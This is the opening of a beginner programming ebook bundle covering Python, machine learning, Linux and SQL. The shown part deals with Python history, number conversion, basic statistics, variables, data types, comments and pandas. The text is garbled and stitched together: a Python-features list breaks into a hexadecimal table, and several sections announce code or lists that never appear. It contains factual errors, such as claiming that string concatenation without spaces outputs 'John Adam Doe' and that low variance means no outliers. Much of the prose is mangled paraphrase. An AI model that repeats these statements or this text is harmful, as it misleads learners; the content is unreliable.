John Cod - Coding Languages - SQL, Linux, Python, Machine Learning. The Step-By-Step Guide For Beginners
John Cod - Coding Languages - SQL, Linux, Python, Machine Learning. The Step-By-Step Guide For Beginners
LANGUAGES
JOHN S. CODE
© Copyright 2019 - All rights reserved.
The content contained within this book may not be reproduced,
duplicated or transmitted without direct written permission from
the author or the publisher.
Under no circumstances will any blame or legal responsibility be
held against the publisher, or author, for any damages, reparation,
or monetary loss due to the information contained within this book.
Either directly or indirectly.
Legal Notice:
This book is copyright protected. This book is only for personal
use. You cannot amend, distribute, sell, use, quote or paraphrase
any part, or the content within this book, without the consent of the
author or publisher.
Disclaimer Notice:
Please note the information contained within this document is for
educational and entertainment purposes only. All effort has been
executed to present accurate, up to date, and reliable, complete
information. No warranties of any kind are declared or implied.
Readers acknowledge that the author is not engaging in the
rendering of legal, financial, medical or professional advice. The
content within this book has been derived from various sources.
Please consult a licensed professional before attempting any
techniques outlined in this book.
By reading this document, the reader agrees that under no
circumstances is the author responsible for any losses, direct or
indirect, which are incurred as a result of the use of information
contained within this document, including, but not limited to, —
errors, omissions, or inaccuracies.
INTRODUTION
First of all I want to congratulate you for having purchased the
bundle on programming languages. This book is aimed at those
who approach programming and coding languages for the first
time and will take you to know the basics, approach the practice,
read important tips and advice on the most popular programming
languages. In these texts you will have the opportunity to know one
of the most innovative operating systems such as Linux, manage
and ordinary data with the well-known SQL language, learn to
write in coding and master it with Python and analyze big data with
the Machine Learning book by fully entering the world of
computer programming. You no longer need to feel left out at work
to have no idea of working with computer data, having a clearer
vision and starting to get serious about your future. The world is
moving forward with technologies and mastering programming
languages becomes more and more fundamental in work and for
your future in general. I wish you a good read and good luck for
this new adventure and for your future.
TABLE OF CONTENTS
1.
PYTHON PROGRAMMING FOR BEGINNERS:
A hands-on easy guide for beginners to learn Python programming fast,
coding language, Data analysis with tools and tricks.
John S. Code
2.
PYTHON MACHINE LEARNING:
THE ABSOLUTE BEGINNER’S GUIDE FOR UNDERSTAND NEURAL
NETWORK, ARTIFICIAL INTELLIGENT, DEEP LEARNING AND
MASTERING THE FUNDAMENTALS OF ML WITH PYTHON.
John S. Code
3.
LINUX FOR BEGINNERS:
THE PRACTICAL GUIDE TO LEARN LINUX OPERATING SYSTEM
WITH THE PROGRAMMING TOOLS FOR THE INSTALLATION,
CONFIGURATION AND COMMAND LINE + TIPS ABOUT HACKING
AND SECURITY.
John S. Code
4.
SQL COMPUTER PROGRAMMING FOR
BEGINNERS:
LEARN THE BASICS OF SQL PROGRAMMING WITH THIS STEP-BY-
STEP GUIDE IN A MOST EASILY AND COMPREHENSIVE WAY FOR
BEGINNERS INCLUDING PRACTICAL EXERCISE.
John S. Code
PYTHON PROGRAMMING FOR
BEGINNERS:
A HANDS-ON EASY GUIDE FOR
BEGINNERS TO LEARN PYTHON
PROGRAMMING FAST, CODING
LANGUAGE, DATA ANALYSIS
WITH TOOLS AND TRICKS.
JOHN S. CODE
Table of Contents
Introduction
Chapter 1 Mathematical Concepts
Chapter 2 What Is Python
Chapter 3 Writing The First Python Program
Chapter 4 The Python Operators
Chapter 5 Basic Data Types In Python
Chapter 6 Data Analysis with Python
Chapter 7 Conditional Statements
Chapter 8 Loops – The Never-Ending Cycle
Chapter 9 File handling
Chapter 10 Exception Handling
Chapter 11 Tips and Tricks For Success
Conclusion
Introduction
Python is an awesome decision on machine learning for a few
reasons. Most importantly, it's a basic dialect at first glance.
Regardless of whether you're not acquainted with Python, getting
up to speed is snappy in the event that you at any point have
utilized some other dialect with C-like grammar.
Second, Python has an incredible network which results in great
documentation and inviting and extensive answers in Stack
Overflow (central!).
Third, coming from the colossal network, there are a lot of valuable
libraries for Python (both as "batteries
included" an outsider), which take care of essentially any issue that
you can have (counting machine learning).
History of Python
Python was invented in the later years of the 1980s. Guido van
Rossum, the founder, started using the language in December 1989.
He is Python's only known creator and his integral role in the
growth and development of the language has earned him the
nickname "Benevolent Dictator for Life". It was created to be the
successor to the language known as ABC.
The next version that was released was Python 2.0, in October of
the year 2000 and had significant upgrades and new highlights,
including a cycle- distinguishing junk jockey and back up support
for Unicode. It was most fortunate, that this particular version,
made vast improvement procedures to the language turned out to
be more straightforward and network sponsored.
Python 3.0, which initially started its existence as Py3K. This
version was rolled out in December of 2008 after a rigorous
testing period. This particular version of Python was hard to roll
back to previous compatible versions which are the most
unfortunate. Yet, a significant number of its real highlights have
been rolled back to versions 2.6 or 2.7 (Python), and rollouts
of Python 3 which utilizes the two to three utilities, that helps to
automate the interpretation of the Python script.
Python 2.7's expiry date was originally supposed to be back
in 2015, but for unidentifiable reasons, it was put off until the
year 2020. It was known that there was a major concern about data
being unable to roll back but roll FORWARD into the new version,
Python 3. In 2017, Google declared that there would be work
done on Python 2.7 to enhance execution under
simultaneously running tasks.
Basic features of Python
Python is an unmistakable and extremely robust programming
language that is object-oriented based almost identical to Ruby,
Perl, and Java, A portion of Python's remarkable highlights:
0001 1
0010 2
0011 3
0100 4
0101 5
0110 6
0111 7
1000 8
1001 9
1010 A
1011 B
1100 C
1101 D
1110 E
1111 F
From the table, we can see ( 1001 )2 is ( 9 )16 and ( 0110 )2,the
MSB group, is ( 6 )16.
Therefore, ( 1101001 )2 = ( 01101001 )2 = ( 69 )16
Hexadecimal to binary
We can use the above given table to quickly convert hexadecimal
numbers to binary equivalents. Let’s convert ( 4EA9 )16 to binary.
( 4 )16 = ( 0100 )2
( E )16 = ( 1110 )2
( A )16 = ( 1010 )2
( 9 )16 = ( 1001 )2
So, ( 4EA9 )16 = ( 0100111010101001 )2 = ( 100111010101001 )2
Decimal to Hexadecimal
You can say hexadecimal is an extended version of decimals.
Let’s convert ( 45781 )10 to decimal. But, first, we have to
remember this table.
Decimal Hexadecimal
0 0
1 1
2 2
3 3
4 4
5 5
6 6
7 7
8 8
9 9
10 A
11 B
12 C
13 D
14 E
15 F
Statistics
Another important field of mathematics that is crucial in various
computer science applications. Data analysis and machine learning
wouldn’t be what they are without the advancements made in
statistical concepts during the 20th century. Let’s see some concepts
related to statistics.
Outlier
Outlier detection is very important in statistical analysis. It helps in
homogenizing the sample data. After detecting the outliers, what to
do with them is crucial because they directly affect the analysis
results. There are many possibilities including:
Discarding Outlier
Sometimes it’s better to discard outliers because they have been
recorded due to some error. This usually happens where the
behavior of the system is already known.
System Malfunction
But, outliers can also indicate a system malfunction. It is always
better to investigate the outliers instead of discarding them
straightaway.
Average
Finding the center of a data sample is crucial in statistical analysis
because it reveals a lot of system characteristics. There are different
types of averages, each signifying something important.
Mean
Mean is the most common average. All the data values are added
and divided by the number of data values added together. For
example, you sell shopping bags to a well-renowned grocery store
and they want to know how much each shopping bag can carry.
You completely fill 5 shopping bags with random grocery items
and weigh them. Here are the readings in pounds.
5.5, 6.0, 4.95, 7.1, 5.0
You calculate the mean as (5.5 + 6 + 4.95 + 7.1 + 5) / 5 = 5.71.
You can tell the grocery store your grocery bags hold 5.71 lbs on
average.
Median
Median is the center value with respect to the position of data in a
sample data when it’s sorted in ascending order. If sample data has
odd members, the median is the value with an equal number of
values on both flanks. If sample data has an even number of values,
the median is calculated by finding the mean of two values in the
middle with equal number of items on both sides.
Mode
Mode is the most recurring value in a dataset. If there is no
recurring value in the sample data, there is no mode.
Variance
To find how much each data value in a sample data changes with
respect to the average of the sample data, we calculate the variance.
Here is a general formula to calculate variance.
sum of (each data point - mean of sample points )2 / number of data
points in the sample.
If the variance is low in a sample data, it means there are no
outliers in the data.
Standard Deviation
We take the square root of variance to find standard deviation. This
relates the mean of sample data to the whole of sample data.
Probability
No one can accurately tell what will happen in the future. We can
only predict what is going to happen with some degree of certainty.
The probability of an event is written mathematically as,
Probability = number of possible ways an event can happen / total
number of possibilities
A few points:
• Python 1.0
After the last update to Python 0.9.0, a new version, Python 1.0,
was released in January of the following year. 1994 marked the
addition of key new features to the Python programming language.
Functional programming tools such as map, reduce, filter, and
lambda were part of the new features of the version 1 release. Van
Rossum mentioned that the obtainment of map, lambda, reduce and
filter was made possible by a LISP hacker who missed them and
submitted patches that worked. Van Rossum's contract with CWI
came to an end with the release of the first update version 1.2 on
the 10th of April, 1995. In the same year, Van Rossum went on to
join CNRI (Corporation for National Research Initiatives) in
Reston, Virginia, United States, where he continued to work on
Python and published different version updates.
Nearly six months following the first version update, version 1.3
was released on the 12th of October, 1995. The third update,
version 1.4, came almost a year later in October of 1996. By then,
Python had developed numerous added features. Some of the
typical new features included an inbuilt support system for
complex numbers and keyword arguments which, although
inspired by Modula-3, shared a bit of a likeness to the keyword
arguments of Common Lisp. Another included feature was a
simple form hiding data through name mangling, although it could
be easily bypassed.
It was during his days at CNRI that Van Rossum began the CP4E
(Computer Programming for Everybody) program which was
aimed at making more people get easy access to programming by
engaging in simple literacy of programming languages. Python was
a pivotal element to van Rossum's campaign, and owing to its
concentration on clean forms of syntax; Python was an already
suitable programming language. Also, since the goals of ABC and
CP4E were quite similar, there was no hassle putting Python to use.
The program was pitched to and funded by DARPA, although it
did become inactive in 2007 after running for eight years.
However, Python still tries to be relatively easy to learn by not
being too arcane in its semantics and syntax, although no priority is
made of reaching out to non-programmers again.
The year 2000 marked another significant step in the development
of Python when the python core development team switched to a
new platform — BeOpen where a new group, BeOpen PythonLabs
team was formed. At the request of CNRI, a new version update
1.6 was released on the 5th of September, succeeding the fourth
version update (Python 1.5) on the December of 1997. This update
marked the complete cycle of development for the programming
language at CNRI because the development team left shortly
afterward. This change affected the timelines of release for the new
version Python 2.0 and the version 1.6 update; causing them to
clash. It was only a question of time before Van Rossum, and his
crew of PythonLabs developers switched to Digital Creations, with
Python 2.0 as the only version ever released by BeOpen.
With the version 1.6 release caught between a switch of platforms,
it didn't take long for CNRI to include a license in the version
release of Python 1.6. The license contained in the release was
quite more prolonged than the previously used CWI license, and it
featured a clause mentioning that the license was under the
protection of the laws applicable to the State of Virginia. This
intervention sparked a legal feud which led The Free Software
Foundation into a debate regarding the "choice-of-law" clause
being incongruous with that if the GNU General Public License. At
this point, there was a call to negotiations between FSF, CNRI, and
BeOoen regarding changing to Python's free software license
which would serve to make it compatible with GPL. The
negotiation process resulted in the release of another version update
under the name of Python 1.6.1. This new version was no different
from its predecessor in any way asides a few new bug fixes and the
newly added GPL-compatible license.
• Python 2.0:
After the many legal dramas surrounding the release of the second-
generation Python 1.0 which corroborated into the release of an
unplanned update (version 1.6.1), Python was keen to put all
behind and forge ahead. So, in October of 2000, Python 2.0 was
released. The new release featured new additions such as list
comprehensions which were obtained from other functional
programming languages Haskell and SETL. The syntax of this
latest version was akin to that found in Haskell, but different in that
Haskell used punctuation characters while Python stuck to
alphabetic keywords.
Python 2.0 also featured a garbage collection system which was
able to collect close reference cycles. A version update (Python
2.1) quickly followed the release of Python 2.0, as did Python
1.6.1. However, due to the legal issue over licensing, Python
renamed the license on the new release to Python Software
Foundation License. As such, every new specification, code or
documentation added from the release of version update 2.1 was
owned and protected by the PSF (Python Software Foundation)
which was a nonprofit organization created in the year 2001. The
organization was designed similarly to the Apache Software
Foundation. The release of version 2.1 came with changes made to
the language specifications, allowing support of nested scopes such
as other statically scoped languages. However, this feature was, by
default, not in use and unrequired until the release of the next
update, version 2.2 on the 21st of December, 2001.
Python 2.2 came with a significant innovation of its own in the
form of a unification of all Python's types and classes. The
unification process merged the types coded in C and the classes
coded in Python into a single hierarchy. The unification process
caused Python's object model to remain totally and continuously
object-oriented. Another significant innovation was the addition of
generators as inspired by Icon. Two years after the release of
version 2.2, version 2.3 was published in July of 2003. It was
nearly another two years before version 2.4 was released on the
30th of November in 2004. Version 2.5 came less than a year after
Python 2.4, in September of 2006. This version introduced a "with"
statement containing a code block in a context manager; as in
obtaining a lock before running the code block and releasing the
lock after that or opening and closing a file. The block of code
made for behavior similar to RAII (Resource Acquisition Is
Initialization) and swapped the typical "try" or "finally" idiom.
The release of version 2.6 on the 1st of October, 2008 was
strategically scheduled such that it coincided with the release of
Python 3.0. Asides the proximity in release date, version 2.6 also
had some new features like the "warnings" mode which outlined
the use of elements which had been omitted from Python 3.0.
Subsequently, in July of 2010, another update to Python 2.0 was
released in the version of python 2.7. The new version updates
shared features and coincided in release with version 3.1 — the
first version update of python 3. At this time, Python drew an end
to the release of Parallel 2.x and 3.x, making python 2.7 the last
version update of the 2.x series. Python went public in 2014,
November precisely, to announce to its username that the
availability of python 2.7 would stretch until 2020. However, users
were advised to switch to python 3 in their earliest convenience.
• Python 3.0:
The fourth generation of Python, Python 3.0, otherwise known as
Py3K and python 3000, was published on the 3rd of December
2008. This version was designed to fix the fundamental flaws in the
design system of the scripting language. A new version number had
to be made to implement the required changes which could not be
run while keeping the stock compatibility of the 2.x series that was
by this time redundant. The guiding rule for the creation of python
3 was to limit the duplication of features by taking out old formats
of processing stuff. Otherwise, Python three still followed the
philosophy with which the previous versions were made. Albeit, as
Python had evolved to accumulate new but redundant ways of
programming alike tasks, python 3.0 was emphatically targeted at
quelling duplicative modules and constructs in keeping with the
philosophy of making one "and
preferably only one" apparent way of doing things. Regardless of
these changes, though, version 3.0 maintained a multi-paradigm
language, even though it didn't share compatibility with its
predecessor.
The lack of compatibility meant Python 2.0 codes were unable to
be run on python 3.0 without proper modifications. The dynamic
typing used in Python as well as the intention to change the
semantics of specific methods of dictionaries, for instance, made a
perfect mechanical conversion from the 2.x series to version 3.0
very challenging. A tool, name of 2to3, was created to handle the
parts of translation which could be automatically done. It carried
out its tasks quite successfully, even though an early review stated
that the tool was incapable of handling certain aspects of the
conversion process. Proceeding the release of version 3.0, projects
that required compatible with both the 2.x and 3.x series were
advised to be given a singular base for the 2.x series. The 3.x series
platform, on the other hand, was to produce releases via the 2to3
tool.
For a long time, editing the Python 3.0 codes were forbidden
because they required being run on the 2.x series. However, now, it
is no longer necessary. The reason being that in 2012, the
recommended method was to create a single code base which could
run under the 2.x and 3.x series through compatibility modules.
Between the December of 2008 and July 2019, 8 version updates
have been published under the python 3.x series. The current
version as at the 8th of July 2019 is the Python 3.7.4. Within this
timeframe, many updates have been made to the programming
language, involving the addition of new features mentioned below:
The image below shows what appears when you press ‘enter’.
You may opt to use a Python shell through idle. If you do, this is
how it would appear:
In the Python 3.5.2 version, the text colors are: function (purple),
string (green) and the result (blue). (The string is composed of the
words inside the bracket (“Welcome to My Corner”), while the
function is the command word outside the bracket (print).
Take note that the image above is from the Python 2.7.12 version.
You have to use indentation for your Python statements/codes. The
standard Python code uses four spaces. The indentations are used in
place of braces or blocks.
In some programming languages, you usually use semi-colons at
the end of the commands–in python, you don’t need to add semi-
colons at the end of the whole statement.
In Python, semi-colons are used in separating variables inside the
brackets.
For version 3, click on your downloaded Python program and save
the file in your computer. Then Click on IDLE (Integrated
DeveLopment Environment), your shell will appear. You can now
start using your Python. It’s preferable to use idle, so that your
codes can be interpreted directly by idle.
Alternative method to open a shell (for some versions).
An alternative method to use your Python is to open a shell through
the following steps:
Step #1– Open your menu.
After downloading and saving your Python program in your
computer, open your menu and find your saved Python file. You
may find it in the downloaded files of your computer or in the files
where you saved it.
Step #2–Access your Python file.
Open your saved Python file (Python 27) by double clicking it. The
contents of Python 27 will appear. Instead of clicking on Python
directly (as shown above), click on Lib instead.
The differences between the three ‘idle’ menu, is that the first two
‘idle’ commands have the black box (shell) too, while the last ‘idle’
has only the ‘white’ box (shell). I prefer the third ‘idle’ because it’
s easy to use.
1. Start IDLE
2. Navigate to the File menu and click New Window
3. Type the following: print (“Hello World!”)
4. On the file, menu click Save. Type the name of
myProgram1.py
5. Navigate to Run and click Run Module to run the
program.
The first program that we have written is known as the “Hello
World!” and is used to not only provide an introduction to a new
computer coding language but also test the basic configuration of
the IDE. The output of the program is “Hello World!” Here is what
has happened, the Print() is an inbuilt function, it is prewritten and
preloaded for you, is used to display whatever is contained in the ()
as long as it is between the double quotes. The computer will
display anything written within the double quotes.
Practice Exercise: Now write and run the following python
programs:
✓ print(“I am now a Python Language Coder!”)
✓ print(“This is my second simple program!”)
✓ print(“I love the simplicity of Python”)
✓ print(“I will display whatever is here in quotes such as
owyhen2589gdbnz082”)
Now we need to write a program with numbers but before writing
such a program we need to learn something about Variables and
Types.
Remember python is object-oriented and it is not statically typed
which means we do not need to declare variables before using them
or specify their type. Let us explain this statement, an object-
oriented language simply means that the language supports viewing
and manipulating real-life scenarios as groups with subgroups that
can be linked and shared mimicking the natural order and
interaction of things. Not all programming languages are object
oriented, for instance, Visual C programming language is not
object-oriented. In programming, declaring variables means that we
explicitly state the nature of the variable. The variable can be
declared as an integer, long integer, short integer, floating integer, a
string, or as a character including if it is accessible locally or
globally. A variable is a storage location that changes values
depending on conditions.
For instance, number1 can take any number from 0 to infinity.
However, if we specify explicitly that int number1 it then means
that the storage location will only accept integers and not fractions
for instance. Fortunately or unfortunately, python does not require
us to explicitly state the nature of the storage location (declare
variables) as that is left to the python language itself to figure out
that.
Before tackling types of variables and rules of writing variables, let
us run a simple program to understand what variables when coding
a python program are.
✓ Start IDLE
✓ Navigate to the File menu and click New Window
✓ Type the following:
num1=4
num2=5
sum=num1+num2
print(sum)
✓ On the file, menu click Save. Type the name of
myProgram2.py
✓ Navigate to Run and click Run Module to run the program.
The expected output of this program should be “9” without the
double quotes.
Discussion
At this point, you are eager to understand what has just happened
and why the print(sum) does not have double quotes like the first
programs we wrote. Here is the explanation.
The first line num1=4 means that variable num1(our shortened way
of writing number1, first number) has been assigned 4 before the
program runs.
The second line num2=5 means that variable num2(our shortened
way of writing number2, second number) has been assigned 5
before the program runs.
The computer interprets these instructions and stores the numbers
given
The third line sum=num1+num2 tells the computer that takes
whatever num1 has been given and add to whatever num2 has been
given. In other terms, sum the values of num1 and num2.
The fourth line print(sum) means that display whatever sum has. If
we put double quotes to sum, the computer will simply display the
word sum and not the sum of the two numbers! Remember that
cliché that computers are garbage in and garbage out. They follow
what you give them!
Note: + is an operator for summing variables and has other uses.
Now let us try out three exercises involving numbers before we
explain types of variables and rules of writing variables so that you
get more freedom to play with variables. Remember variables
values vary for instance num1 can take 3, 8, 1562, 1.
Follow the steps of opening Python IDE and do the following:
✓ The output should be 54
num1=43
num2=11
sum=num1+num2
print(sum)
✓ The output should be 167
num1=101
num2=66
sum=num1+num2
print(sum)
✓ The output should be 28
num1=9
num2=19
sum=num1+num2
print(sum)
1. Variables
We have used num1, num2, and sum and the variable names were
not just random, they must follow certain rules and conventions.
Rules are what we cannot violate while conventions are much like
the recommended way. Let us start with the rules:
The Rules of When Naming Variables in Python
Practice Exercise
Write/suggest five variables for:
✓ Hospital department.
✓ Bank.
✓ Media House.
Given scri=75, scr4=9, sscr2=13, Scr=18
✓ The variable names in above are supposed to represents
scores of students. Rewrite the variables to satisfy Python variable
rules and conventions.
total=2+9+3+6+8+2+5+1+14+5+21+26+4+7+13+31+24
count=13+1+56+3+7+9+5+12+54+4+7+45+71+4+8+5
Semicolons are also used when creating multiple statements in a
single line. Assume we have to assign and display the age of four
employees in a python program. The program could be written as:
employee1=25; employee2=45; employee3=32; employee4=43.
6. Indentation in Python
Indentation is used for categorization program lines into a block in
Python. The amount of indentation to use in Python depends
entirely on the programmer. However, it is important to ensure
consistency. By convention, four whitespaces are used for
indentation instead of using tabs. For example:
Note: We will explain what kind of program of this is later.
Indentation in Python also helps make the program look neat and
clean. Indentation creates consistency. However, when performing
line continuation indentation can be ignored. Incorrect indentation
will create an indentation error. Correct python programs without
indentation will still run but they might be neat and consistent from
human readability view.
7. Comments in Pythons
When writing python programs and indeed any programming
language, comments are very important. Comments are used to
describe what is happening within a program. It becomes easier for
another person taking a look at a program to have an idea of what
the program does by reading the comments in it. Comments are
also useful to a programmer as one can forget the critical details of
a program written. The hash (#) symbol is used before writing a
comment in Python. The comment extends up to the newline
character. The python interpreter normally ignores comments.
Comments are meant for programmers to understand the program
better.
Example
Start IDLE
Navigate to the File menu and click New Window
Type the following:
#This is my first comment
#The program will print Hello World
Print(‘Hello World’) #This is an inbuilt function to
display
Multi-Line Comments
Just like multi-line program statements we also have multi-line
comments. There are several ways of writing multi-line comments.
The first approach is to type the hash (#) at each comment line
starting point.
For Example
Start IDLE.
Navigate to the File menu and click New Window.
Type the following:
#I am going to write a long comment line
#the comment will spill over to this line
#and finally end here.
The second way of writing multi-line comments involves using
triple single or double quotes: ‘’’ or”””. For multi-line strings and
multi-line comments in Python, we use the triple quotes. Caution:
When used in docstrings they will generate extra code but we do
not have to worry about this at this instance.
Example:
Start IDLE.
Navigate to the File menu and click New Window.
Type the following:
“””This is also a great i
illustration of
a multi-line comment in Python”””
Summary
Variable are storage locations that a user specifies before writing
and running a python program. Variable names are labels of those
storage locations. A variable holds a value depending on
circumstances. For instance, doctor1 can be Daniel, Brenda or Rita.
Patient1 can be Luke, William or Kelly. Variable names are written
by adhering to rules and conventions. Rules are a must while
conventions are optional but recommended as they help write
readable variable names. When writing a program, you should
assume that another person will examine or run it without your
input and thus should be well written. In programming, declaring
variables means that we explicitly state the nature of the variable.
The variable can be declared as an integer, long integer, short
integer, floating integer, a string, or as a character including if it is
accessible locally or globally. A variable is a storage location that
changes values depending on conditions. Use descriptive names
when writing your variables.
The Python Operators
1. webServerOpen = True
2. lockdownState = False
3. underMaintenance = False
If you are unsure about the data type of a variable, Python allows
you to easily access the data type using the type() function.
If you run the following code next,
1. print(type(webServerOpen))
2. print(type(lockdownState))
You will get the following output:
The function returns the data type of the variable which is sent
inside its parenthesis. The values inside the parenthesis are called
arguments. Here, ‘bool’ represents a Boolean variable.
Strings
Remember, in our first program, when we printed “Hello World!”.
We called it a phrase or text which is not built into Python but can
be used to convey messages from the user. This text or similar
phrases are called Strings in programming languages.
Strings are nothing more than a series of characters. Whenever you
see something enclosed with double quotation marks or single
quotation marks, the text inside is considered a string.
For example, these two variables that I’ve just declared are both
Strings and perfectly valid.
1. firstName = "John"
2. middleName = "Adam"
3. lastName = "Doe"
4. fullName = firstName + middleName + lastName
5. print(fullName)
What’s the output? John Adam Doe
If you want to run some other methods on the output, feel free.
Here’s a program which runs some tests on the variables:
firstName = "John"
middleName = "Adam"
lastName = "Doe"
fullName = firstName + middleName + lastName
print(fullName.lower())
message = "The manager, " + fullName.title() + ", is a good
person."
What would be the output? For the first print statement:
john adam doe – All lowercase letters. For the second print
statement:
The manager, John Adam Doe, is a good person. – Concatenated
a string on which a method was applied.
So, you can use these methods on every string in your program and
it will output just fine.
Adding Whitespaces:
Whitespaces refer to the characters which are used to produce
spacing in between words, characters, or sentences using tabs,
spaces, and line breaks. It’s better to use properly use whitespaces
so the outputs are readable for users.
To produce whitespaces using tabs, use this combination of
characters ‘\t’. Here’s an example to show you the difference with
and without the tab spacing.
a = 2424
b = 10101
c = 9040
Floats
If you declare a number with a decimal point, Python will
automatically consider it a floating-point number or a float.
All operations you could perform on integers, they can also be
performed on floating point numbers. If you run the type function
on floats, you’ ll get a type ‘float’.
Here’s a program to show some operations on floats:
w = 1.2 * 0.3
print(w)
x = 10.4 + 1.6
print(x)
y = 10.555 + 22.224
print(y)
z = 0.004 + 0.006
print(z)
Here is the output to all four print statements:
0.36
12.0
32.778999999999996
0.01
Type Casting: What Is It?
Another fact about Python is that it is a dynamically-typed
language.
A weakly-typed or dynamically-typed language doesn’t associate a
data type with your variable at the time you are typing your code.
Rather, the type is associated with the variable at run-time Not
clear? Let’s see an example.
x = 10
x = "I am just a phrase"
x = 10.444
x = True
When you run this code, it’ll perform its desired actions correctly.
Let’s see what happens with the variable ‘x’ though. We’ve written
four statements and assigned different values to ‘x’.
On run-time (when you interpret or run your program), on line 1,
‘x’ is an integer. On line 2, it’s a string. On line 3, it’s a float, and
finally, it’s a Boolean value.
However, through typecasting, we can manually change the types
of each variable. The functions we’ll be using for that purpose are
str(), int(), and float().
Let’s expand the same example:
x = 10
x = float(x)
print(type(x))
x = "I am just a phrase"
print("x: " + x)
print(type(x))
x = 10.444
x = int(x)
print(type(x))
x = False
x = int(x)
print(x)
In this program, we’ve used everything covered in the last few
lessons. All data types and converted them using our newly learned
function.
In the first case, x is converted into a float and the type function
does verify that for us. Secondly, the string is still a string since it
can’t be converted into numbers, int or float. Thirdly, we convert
the float into an integer.
As an added exercise, if you print the newly changed value of the
third case, you’ll see that the value of x is: 10. This is because the
type is now changed and the values after the decimal point are
discarded.
In the fourth case, we print the value of x which is False. Then, we
change its value to an integer. Here, something else comes up. The
output? 0.
It’s because, in Python, the value of True is usually any non-zero
number (typically 1) and for False, it’s 0. So, their integer
conversions yield 1 and 0 for True and False respectively.
Comments
Comments are text phrases that are put in the code to make it
understandable and readable for other coders, readers, and
programmers.
Why Are Comments Important?
Comments are very important, especially when you’re working
with other programmers and they’ll be reviewing your code sooner
or later. Through comments, you can write a small description of
the code and tell them what it does.
Also, if you have other details or personal messages which are
relevant to the code, you can put them there, since the interpreter
doesn’t catch them.
How to Write Comments?
In python, there are two ways to write comments, and we’ll be
exploring both of them. For our first method, you can use the “#”
symbol in front of the line you wish to comment. Here, take a look
at this code:
# This line is a comment
# Count is a simple variable
count = 15
print(count)
If you run this code, the output will be 15. This is because the
comments lines (starting with #) are not run at all.
Now, this method is fine if your commented lines are less i.e. do
not span over multiple lines. But, if they do, hashing all of them is
a waste of time. For our second comment, we’ll enclose our
commented lines is three single quotation marks (‘’’) and close
it with three quotation marks as well. Here’s an example:
1. '''
2. This comment spans
3. on multiple lines.
4. '''
5. count = 15
6. print(count)
Notice, we have to close our multi-line comment, unlike the single
line comment.
Data Analysis with Python
Another topic that we need to explore a bit here is how Python, and
some of the libraries that come with it, can work with the process
of data analysis. This is an important process for any businesses
because it allows them to take all of the data and information they
have been collecting for a long time, and then can put it to good use
once they understand what has been said within the information. It
can be hard for a person to go through all of this information and
figure out what is there, but for a data analyst who is able to use
Python to complete the process, it is easy to find the information
and the trends that you need.
The first thing that we need to look at here though is what data
analysis is all about. Data analysis is going to be the process that
companies can use in order to extract out useful, relevant, and even
meaningful information from the data they collect, in a manner that
is systematic. This ensures that they are able to get the full
information out of everything and see some great results in the
process. There are a number of reasons that a company would
choose to work on their own data analysis, and this can include:
One thing that we need to make sure that we are watching out for is
the idea of bias in the information that we have. If you go into the
data analysis with the idea that something should turn out a certain
way, or that you are going to manipulate the data so it fits the ideas
that you have, there are going to be some problems. You can
always change the data to say what you would like, but this doesn’t
mean that you are getting the true trends that come with this
information, and you may be missing out on some of the things that
you actually need to know about.
This is why a lot of data analysts will start this without any kind of
hypothesis at all. This allows them to see the actual trends that
come with this, and then see where the information is going to take
you, without any kind of slant with the information that you have.
This can make life easier and ensures that you are actually able to
see what is truly in the information, rather than what you would
like to see in that information.
Now, there are going to be a few different types of data that you
can work with. First, there is going to be the deterministic. This is
going to also be known as the data analysis that is non-random.
And then there is going to be the stochastic, which is pretty much
any kind that is not going to fit into the category of deterministic.
There are a few stages that are going to come with this data life
cycle, and we are going to start out with some of the basics to
discuss each one to help us see what we are able to do with the data
available to us. First, we work with data capture. The first
experience that an individual or a company should have with a data
item is to have it pass through the firewalls of the enterprise. This
is going to be known as the Data Capture, which is basically going
to be the act of creating values of data that do not exist yet and
have never actually existed in that enterprise either. There are three
ways that you can capture the data including:
Once you have been able to maintain the data and get it all cleaned
up, it is time to work on the part known as data synthesis. This is a
newer phase in the cycle and there are some places where you may
not see this happen. This is going to be where we create some of
the values of data through inductive logic, and using some of the
data that we have from somewhere else as the input. The data
synthesis is going to be the arena of analytics that is going to use
modeling of some kind to help you get the right results in the end.
Data usage comes next. This data usage is going to be the part of
the process where we are going to apply the data as information to
tasks that the enterprise needs to run and then handle the
management on its own. This would be a task that normally falls
outside of your life cycle for the data. However, data is becoming
such a central part of the model for most businesses and having this
part done can make a big difference.
Now, what if you would like to go through all of that data, but you
would like to only take a look at the data that comes with one
specific country. Let’s say that you would like to look at America
and you want to see what percentage of rain it received between
2016 and 2017. Now, how are you going to get this information in
a quick and efficient manner?
What we would need to do to make sure that we were able to get
ahold of this particular set of data is to work with the data analysis.
There are several algorithms, especially those that come from
machine learning, that would help you to figure out the percentage
of rain that America gets between 2016 to 2017. And this whole
process is going to be known as what data analysis is really all
about.
There are a lot of things that you can enjoy when it comes to
working on the Python library. First off, this is one of the most
popular and easy to use libraries when it comes to data science and
it is going to work on top of the NumPy library. The one thing that
a lot of coders are going to like about working with Pandas is that it
is able to take a lot of the data that you need, including a SQL
database or a TSV and CSV file, and will use it to create an object
in Python. This object is going to have columns as well as rows
called the data frame, something that looks very similar to what we
see with a table in statistical software including Excel.
There are many different features that are going to set Pandas apart
from some of the other libraries that are out there. Some of the
benefits that you are going to enjoy the most will include:
Working with the Pandas library is one of the best ways to handle
some of the Python codings that you want to do with the help of
data analysis. As a company, it is so important to be able to go
through and not just collect data, but also to be able to read through
that information and learn some of the trends and the information
that is available there. being able to do this can provide your
company with some of the insights that it needs to do better, and
really grow while providing customer service.
There are a lot of different methods that you can use when it comes
to performing data analysis. And some of them are going to work
in a different way than we may see with Python or with the Pandas
library. But when it comes to efficiently and quickly working
through a lot of data, and having a multitude of algorithms and
more that can sort through all of this information, working with the
Python Pandas is the best option.
Conditional Statements
If Statements
More often than not, you’re faced with a situation where you have
to decide something and then, a few things happen in response to
your decision.
Similarly, programming languages also allow you to write
conditional tests, with which, you can check a condition and make
responses according to it. Let’s take a real-life example, and then
code it. If the stove is on, then close it. If it is not on, then do
nothing.
If you take a look, we use the keyword ‘if’ when we’re trying to
put forth a condition. If this, then that. Likewise, Python uses the if
statement to allow you to make a decision based on something.
That ‘something’ in our example was, whether or not the stove was
on. Let’s code it.
‘if-elif-else’ Statements
Usually, when asked to write multiple conditions, you might write
them in a similar fashion: If this, then do this. Else if this, then do
that. Else (none of these), do something completely different.
See, how all these if-elseif-else clauses are linked to one single
conditional statement? This is where the elif or Else If block
comes in. If your variable, the one you wish to use for your
conditional test, has many values, and needs to output differently
